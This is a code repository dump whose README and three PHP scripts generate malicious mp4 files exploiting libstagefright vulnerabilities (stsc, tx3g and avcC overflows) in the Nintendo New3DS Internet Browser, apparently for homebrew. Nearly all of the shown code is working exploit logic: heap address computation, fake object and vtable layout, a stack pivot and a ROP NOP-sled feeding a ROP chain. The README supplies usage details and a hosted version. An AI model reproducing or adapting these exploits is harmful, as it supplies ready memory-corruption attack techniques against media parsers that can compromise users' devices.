├── frighthax_header.mp4
├── frighthax_header_tx3g.mp4
├── README.md
├── browserhax_fright.php
├── browserhax_fright_tx3g.php
└── skater31hax.php


/frighthax_header.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yellows8/browserhax_fright/HEAD/frighthax_header.mp4


--------------------------------------------------------------------------------
/frighthax_header_tx3g.mp4:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/yellows8/browserhax_fright/HEAD/frighthax_header_tx3g.mp4


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | This repo contains exploits for libstagefright used in the Nintendo New3DS system Internet Browser.
 2 | 
 3 | The stsc exploit is based on a PoC from here: https://blog.zimperium.com/stagefright-vulnerability-details-stagefright-detector-tool-released/
 4 | 
 5 | This requires the following repo: https://github.com/yellows8/3ds_browserhax_common See that repo for usage info as well.  
 6 | 
 7 | * stsc("browserhax_fright.php"): All system-versions <=10.1.0-27 are supported. System-version 10.2.0-28 fixed the vuln used by this. This was originally implemented on August 6-7, 2015.
 8 | * tx3g("browserhax_fright_tx3g.php"): All system-versions <=10.5.0-30 are supported, vuln was fixed with 10.6.0-31. From the .php: "This tx3g version was originally implemented using system-version v10.2, on November 3, 2015. The PoC mp4 this is based on is from roughly October 24, 2015."
 9 | * skater31hax: All system-versions <=11.0.0-33 are supported. See the source if you want any more vuln details etc.
10 | 
11 | Currently the length of the URL used for accessing this hax must be less than 48 characters.
12 | 
13 | The exploits will automatically trigger when loading the mp4, no user-input needed once mp4-loading is started. There must be less than 3 open browser tabs when running the exploits, not including the tab for the mp4. If you want to access these exploits via QR-code, just use the QR-code from the site linked below(the exploits aren't usable with direct URLs for these exploits via QR-code).  
14 | 
15 | See the following for a hosted version of this: https://yls8.mtheall.com/3dsbrowserhax.php  
16 | 
17 | 
18 | See here regarding Wii U: https://github.com/yellows8/wiiu_browserhax_fright
19 | 
20 | 


--------------------------------------------------------------------------------
/browserhax_fright.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | include_once("/home/yellows8/browserhax/browserhax_cfg.php");
 4 | 
 5 | include_once("3dsbrowserhax_common.php");
 6 | 
 7 | if(($browserver & 0x80) == 0)
 8 | {
 9 | 	echo "This browser is not supported.\n";
10 | 	//error_log("browserhax_fright.php: BROWSER NOT SUPPORTED.");
11 | 	exit;
12 | }
13 | 
14 | $con = file_get_contents("frighthax_header.mp4");
15 | 
16 | $url_len = strlen("http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) + 1;//The address of the below mp4 buffer varies depending on the length of the requested URL. Only URLs with string length < 48 characters is currently supported(without updating the below code).
17 | $baseaddr = 0x39531f00;
18 | if($url_len < 33)
19 | {
20 | 	$baseaddr = 0x39531ea0;
21 | }
22 | else
23 | {
24 | 	if($url_len < 41)
25 | 	{
26 | 		$url_len-= 32;
27 | 	}
28 | 	else
29 | 	{
30 | 		$url_len-= 40;
31 | 		$baseaddr = 0x39531f10;
32 | 	}
33 | }
34 | $heapaddr_stscarraydata_off_x1200 = /*0x39531c88*/$baseaddr+0x577+0x1201 + (($url_len + 0x3) & ~0x3);
35 | //$heapaddr_stscarraydata_off_x1200 = 0x39533680;//Offset 0x1201 relative to the stsc entries data start, in the buffer containing the *entire* raw mp4. This hax will work fine as long as this address lands at <stsc entries data start>+0x201 .. <stsc entries data start>+0x21f1, and is 0x10-byte aligned relative to <stsc entries data start>+0x201.
36 | $fake_vtableptr = $heapaddr_stscarraydata_off_x1200+0x2000;
37 | $stackptr = $fake_vtableptr+0x2000;
38 | 
39 | $ROPHEAP = 0x10000000-0x1e000;//0x08100000;//Don't use any memory nearby the above mp4 buffer, since that causes corruption issues.
40 | 
41 | $generatebinrop = 1;
42 | generate_ropchain();
43 | 
44 | $entry_wordindex = 0;
45 | 
46 | for($i=0; $i<0x200; $i+=4)//Setup the data which will get copied to the output buffer. When that data is copied, each word in the entry is converted to machine-endian, and the first word value is decreased by 1. The allocated output buffer is only 0x18-bytes(due to integer overflow), hence this will result in a buffer overflow. This will overwrite the objectptr used for reading data, hence data-reading will stop at the time the overwritten object gets used.
47 | {
48 | 	$writeval = $heapaddr_stscarraydata_off_x1200;
49 | 	if($entry_wordindex == 0)$writeval++;
50 | 	$con.= pack("N*", $writeval);
51 | 	
52 | 	$entry_wordindex++;
53 | 	if($entry_wordindex==2)$entry_wordindex = 0;
54 | }
55 | 
56 | $con.= pack("C*", 0x0);//Align the offset after this, and as a result the address, to 4-bytes.
57 | 
58 | for($i=0; $i<(0x2000/0x10); $i++)//Setup the data which will be used at offset 0x1200 relative to the stsc entries data start, in the buffer containing the *entire* raw mp4. This is where the object data for the above objectptr is located.
59 | {
60 | 	$con.= pack("V*", $fake_vtableptr);//Fake vtable ptr, the 0x34-bytes starting here is also popped into r0..ip during stack-pivot.
61 | 	//for($pos=0x4; $pos<0x34; $pos+=4)$con.= pack("V*", $fake_vtableptr);//Setup r1..ip for the stack-pivot.
62 | 	$con.= pack("V*", $stackptr);//Setup sp for the stack-pivot.
63 | 	$con.= pack("V*", $POPPC);//Setup lr for the stack-pivot.
64 | 	$con.= pack("V*", $POPPC);//Setup pc for the stack-pivot.
65 | }
66 | 
67 | for($i=0; $i<0x2000; $i+=4)//Setup the data which will be used at offset 0x1200+0x2000 relative to the stsc entries data start, in the buffer containing the *entire* raw mp4. This is where the fake vtable for the above object is located.
68 | {
69 | 	$con.= pack("V*", $STACKPIVOT_ADR);
70 | }
71 | 
72 | for($i=0; $i<0x2000; $i+=4)//Setup the data which will be used at offset 0x1200+0x2000+0x2000 relative to the stsc entries data start, in the buffer containing the *entire* raw mp4. This is where the ROP stack is located, starting with a ROP NOP-sled.
73 | {
74 | 	$con.= pack("V*", $POPPC);
75 | }
76 | 
77 | $con.= $ROPCHAIN;//Beginning of the actual ROP.
78 | 
79 | header("Content-Type: video/mp4");
80 | 
81 | echo $con;
82 | 
83 | ?>
84 | 


--------------------------------------------------------------------------------
/browserhax_fright_tx3g.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | //This tx3g version was originally implemented using system-version v10.2, on November 3, 2015. The PoC mp4 this is based on is from roughly October 24, 2015.
  4 | //The exploitation method used here is just one of the ways to exploit this(in this case it's the smallest one with overflow-size). Larger overflow-sizes/etc can cause other crashes(with invalid data), stack overwrite included.
  5 | 
  6 | include_once("/home/yellows8/browserhax/browserhax_cfg.php");
  7 | 
  8 | include_once("3dsbrowserhax_common.php");
  9 | 
 10 | if(($browserver & 0x80) == 0)
 11 | {
 12 | 	echo "This browser is not supported.\n";
 13 | 	//error_log("browserhax_fright.php: BROWSER NOT SUPPORTED.");
 14 | 	exit;
 15 | }
 16 | 
 17 | $con = file_get_contents("frighthax_header_tx3g.mp4");
 18 | 
 19 | $url_len = strlen("http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) + 1;//The address of the below mp4 buffer varies depending on the length of the requested URL. Only URLs with string length < 48 characters is currently supported(without updating the below code).
 20 | $baseaddr = 0x39531f00;
 21 | if($url_len < 33)
 22 | {
 23 | 	$baseaddr = 0x39531ea0;
 24 | }
 25 | else
 26 | {
 27 | 	if($url_len < 41)
 28 | 	{
 29 | 		$url_len-= 32;
 30 | 	}
 31 | 	else
 32 | 	{
 33 | 		$url_len-= 40;
 34 | 		$baseaddr = 0x39531f10;
 35 | 	}
 36 | }
 37 | $heapaddr_haxdatastart = /*0x39531c88*/$baseaddr+0x1318+0x4 + (($url_len + 0x3) & ~0x3);//Address in the *entire* mp4 buffer, located at the memory for the $heapaddr_haxdata_refcountobj ptrs setup below.
 38 | $heapaddr_haxdata_refcountobj = $heapaddr_haxdatastart+0x2000;
 39 | $fake_objptr = $heapaddr_haxdata_refcountobj+0x2000;
 40 | $fake_vtableptr = $fake_objptr+0x2000;
 41 | $stackptr = $fake_vtableptr+0x2000;
 42 | 
 43 | $ROPHEAP = 0x10000000-0x1e000;//0x08100000;//Don't use any memory nearby the above mp4 buffer, since that causes corruption issues.
 44 | 
 45 | $generatebinrop = 1;
 46 | generate_ropchain();
 47 | 
 48 | $con.= pack("N*", 0x210);//First tx3g chunk(size+chunkid).
 49 | $con.= pack("N*", 0x74783367);
 50 | 
 51 | //Setup the data used with the buf-overflow.
 52 | for($i=0; $i<0x208; $i+=4)
 53 | {
 54 | 	$writeval = $heapaddr_haxdatastart;
 55 | 	$con.= pack("V*", $heapaddr_haxdatastart);
 56 | }
 57 | 
 58 | $con.= pack("N*", 0x1c5);//Setup the mdia chunk.
 59 | $con.= pack("N*", 0x6d646961);
 60 | 
 61 | $con.= pack("N*", 0x1);//Setup the second tx3g chunk: size+chunkid, followed by the actual chunk size in u64 form.
 62 | $con.= pack("N*", 0x74783367);
 63 | $con.= pack("N*", 0x1);
 64 | $con.= pack("N*", 0xfffffdf0);
 65 | 
 66 | for($i=0; $i<0x2000; $i+=4)
 67 | {
 68 | 	$con.= pack("V*", $heapaddr_haxdata_refcountobj);//Ptrs to the memory which gets setup below.
 69 | }
 70 | 
 71 | for($i=0; $i<(0x2000/0x10); $i++)
 72 | {
 73 | 	$con.= pack("V*", 0x1);
 74 | 	$con.= pack("V*", 0x1);
 75 | 	$con.= pack("V*", $fake_objptr);
 76 | 	$con.= pack("V*", $fake_objptr-4);//If this ptr gets loaded instead of the above one, then the object is @ addr-4.
 77 | }
 78 | 
 79 | for($i=0; $i<(0x2000/0x10); $i++)//This is where the object data for the above objectptr is located.
 80 | {
 81 | 	$con.= pack("V*", $fake_vtableptr);//Fake vtable ptr, the 0x34-bytes starting here is also popped into r0..ip during stack-pivot.
 82 | 	//for($pos=0x4; $pos<0x34; $pos+=4)$con.= pack("V*", $fake_vtableptr);//Setup r1..ip for the stack-pivot.
 83 | 	$con.= pack("V*", $stackptr);//Setup sp for the stack-pivot.
 84 | 	$con.= pack("V*", $POPPC);//Setup lr for the stack-pivot.
 85 | 	$con.= pack("V*", $POPPC);//Setup pc for the stack-pivot.
 86 | }
 87 | 
 88 | for($i=0; $i<0x2000; $i+=4)//This is where the fake vtable for the above object is located.
 89 | {
 90 | 	$con.= pack("V*", $STACKPIVOT_ADR);
 91 | }
 92 | 
 93 | for($i=0; $i<0x2000; $i+=4)//This is where the ROP stack is located, starting with a ROP NOP-sled.
 94 | {
 95 | 	$con.= pack("V*", $POPPC);
 96 | }
 97 | 
 98 | $con.= $ROPCHAIN;//Beginning of the actual ROP.
 99 | 
100 | header("Content-Type: video/mp4");
101 | 
102 | echo $con;
103 | 
104 | ?>
105 | 


--------------------------------------------------------------------------------
/skater31hax.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | //The vuln used here was discovered with manual code-RE, and exploited, on July 6, 2016. This is a stack buffer overflow, due to a broken size check.
  4 | 
  5 | include_once("/home/yellows8/browserhax/browserhax_cfg.php");
  6 | 
  7 | include_once("3dsbrowserhax_common.php");
  8 | 
  9 | if(($browserver & 0x80) == 0)
 10 | {
 11 | 	echo "This browser is not supported.\n";
 12 | 	exit;
 13 | }
 14 | 
 15 | $url_len = strlen("http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI']) + 1;//The address of the below mp4 buffer varies depending on the length of the requested URL. Only URLs with string length < 48 characters is currently supported(without updating the below code).
 16 | $baseaddr = 0x39531f00;
 17 | if($url_len < 33)
 18 | {
 19 | 	$baseaddr = 0x39531ea0;
 20 | }
 21 | else
 22 | {
 23 | 	if($url_len < 41)
 24 | 	{
 25 | 		$url_len-= 32;
 26 | 	}
 27 | 	else
 28 | 	{
 29 | 		$url_len-= 40;
 30 | 		$baseaddr = 0x39531f10;
 31 | 	}
 32 | }
 33 | $heapaddr_haxdatastart = /*0x39531c88*/$baseaddr+0x1318+0x4 + (($url_len + 0x3) & ~0x3);//Address within the *entire* mp4 buffer.
 34 | $heapaddr_haxdatastart+= 0x4;
 35 | 
 36 | $ROPHEAP = 0x10000000-0x1e000;
 37 | 
 38 | $generatebinrop = 1;
 39 | generate_ropchain();
 40 | 
 41 | $con = "";
 42 | 
 43 | //Generate the mp4 header.
 44 | $con.= pack("N*", 0x00000020);
 45 | $con.= pack("N*", 0x66747970);
 46 | $con.= pack("N*", 0x69736F6D);
 47 | $con.= pack("N*", 0x00000200);
 48 | $con.= pack("N*", 0x69736F6D);
 49 | $con.= pack("N*", 0x69736F32);
 50 | $con.= pack("N*", 0x61766331);
 51 | $con.= pack("N*", 0x6D703431);
 52 | $con.= pack("N*", 0x00000008);
 53 | $con.= pack("N*", 0x66726565);
 54 | 
 55 | //Setup the avcC haxx chunk: size+chunkid, followed by the actual chunk size in 64bit form.
 56 | $con.= pack("N*", 0x1);
 57 | $con.= pack("N*", 0x61766343);
 58 | $con.= pack("N*", 0xFFFFFFFF);
 59 | $con.= pack("N*", 0x200+0x10);//Use +0x10 so that the actual low-u32 size is 0x200. Note that the stack-frame isn't actually this large.
 60 | 
 61 | //The v10.6 SKATER libstagefright avcC handler code is *very* old. It does this signed compare: if(0x100 < chunk_data_size)fail
 62 | //Then readAt() is called with buf=sp+0x40 and size=<low word from chunk_data_size>.
 63 | //If that's successful, it then calls mLastTrack->meta->setData() with the above buf and size. For loading the mLastTrack ptr, it loads the saved inr0 _this from sp+0x140, then it loads mLastTrack from there.
 64 | 
 65 | //Hence, the size check can be bypassed by using a 64bit negative chunk_size, with whatever size you want to copy to stack for the low-word in the chunk_size, +0x10.
 66 | //When the copy-size is large enough(see above), the saved _this ptr will be corrupted. A fake _this ptr and the data used with it has to be setup so that it doesn't crash with that, hence this just does a stack-pivot with an object vtable funcptr call.
 67 | 
 68 | //Setup the data copied to stack.
 69 | for($i=0; $i<0x200; $i+=4)
 70 | {
 71 | 	$con.= pack("V*", $heapaddr_haxdatastart);//Overwrite the _this ptr(and other data which doesn't get used on stack) with $heapaddr_haxdatastart, address of the below data.
 72 | }
 73 | 
 74 | //Data used with the fake _this starts here. Another mp4 "chunk" would start here too, but that won't get parsed.
 75 | 
 76 | for($i=0; $i<0x2000; $i+=4)
 77 | {
 78 | 	$con.= pack("V*", $heapaddr_haxdatastart+0x2000);//Setup the mLastTrack ptr, address of the below data.
 79 | }
 80 | 
 81 | for($i=0; $i<0x2000; $i+=4)
 82 | {
 83 | 	$con.= pack("V*", $heapaddr_haxdatastart+0x4000);//Setup the meta ptr from mLastTrack, address of the below data.
 84 | }
 85 | 
 86 | for($i=0; $i<(0x2000/0x10); $i++)//This is where the object data for the above objectptr(meta) is located.
 87 | {
 88 | 	$con.= pack("V*", $heapaddr_haxdatastart+0x6000);//Fake vtable ptr, the 0x34-bytes starting here is also popped into r0..ip during stack-pivot.
 89 | 	$con.= pack("V*", $heapaddr_haxdatastart+0x8000);//Setup sp for the stack-pivot.
 90 | 	$con.= pack("V*", $POPPC);//Setup lr for the stack-pivot.
 91 | 	$con.= pack("V*", $POPPC);//Setup pc for the stack-pivot.
 92 | }
 93 | 
 94 | for($i=0; $i<0x2000; $i+=4)//This is where the fake vtable for the above object is located.
 95 | {
 96 | 	$con.= pack("V*", $STACKPIVOT_ADR);
 97 | }
 98 | 
 99 | for($i=0; $i<0x2000; $i+=4)//This is where the ROP stack is located, starting with a ROP NOP-sled.
100 | {
101 | 	$con.= pack("V*", $POPPC);
102 | }
103 | 
104 | $con.= $ROPCHAIN;//Beginning of the actual ROP.
105 | 
106 | header("Content-Type: video/mp4");
107 | 
108 | echo $con;
109 | 
110 | ?>
111 | 


--------------------------------------------------------------------------------